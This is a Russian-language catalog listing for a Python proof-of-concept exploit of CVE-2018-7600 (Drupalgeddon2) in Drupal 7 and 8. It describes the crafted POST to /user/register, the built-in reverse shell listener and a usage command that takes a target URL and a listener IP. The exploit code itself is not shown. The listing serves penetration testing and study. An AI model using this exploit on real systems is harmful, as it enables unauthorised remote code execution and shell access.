Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2018-7600 — PoC для CVE-2018-7600 | Kitploit
Инструменты/GitHubGitHub/muhammedkayag/cve-2018-7600
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеОбучение и ОбразованиеИнструмент Удаленного Доступа
GitHubmuhammedkayag/cve-2018-7600

CVE-2018-7600

PoC для CVE-2018-7600

Репозиторий
112 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2018-7600 (Drupalgeddon2) Exploit – Python3

ПРЕДУПРЕЖДЕНИЕ:
Этот проект предназначен только для образовательных целей и авторизованного тестирования на проникновение.
НЕ используйте этот код на системах, которыми вы не владеете или на тестирование которых у вас нет явного письменного разрешения.
Несанкционированное использование незаконно и наказуемо по закону.
Автор не несёт ответственности за любое неправомерное использование этого инструмента.

Описание

Этот скрипт на Python3 эксплуатирует уязвимость CVE-2018-7600 (Drupalgeddon2) — критическую ошибку удалённого выполнения кода (RCE), затрагивающую несколько версий Drupal. Уязвимость позволяет злоумышленникам выполнять произвольные команды на уязвимом сервере без аутентификации. Этот эксплойт отправляет вредоносную полезную нагрузку через специально сформированный POST-запрос к конечной точке /user/register, используя механизм AJAX-рендеринга форм Drupal для выполнения системных команд.

Кроме того, скрипт включает:

  • Слушатель обратной оболочки (Reverse Shell Listener) – автоматически ожидает входящие подключения.
  • Полноценное повышение до интерактивной оболочки – позволяет взаимодействовать со скомпрометированным хостом в реальном времени.

Затронутые версии

Drupal 7.x и 8.x (до выпуска исправлений в марте 2018 года) уязвимы.
Подробнее см.: 🔗

Скачать инструмент

Консультация по безопасности Drupal

Требования

Установите необходимые модули Python:

root@kitploit:~
pip install requests termcolor

Использование

root@kitploit:~
python3 exploit.py <TARGET_URL> <LISTENER_IP>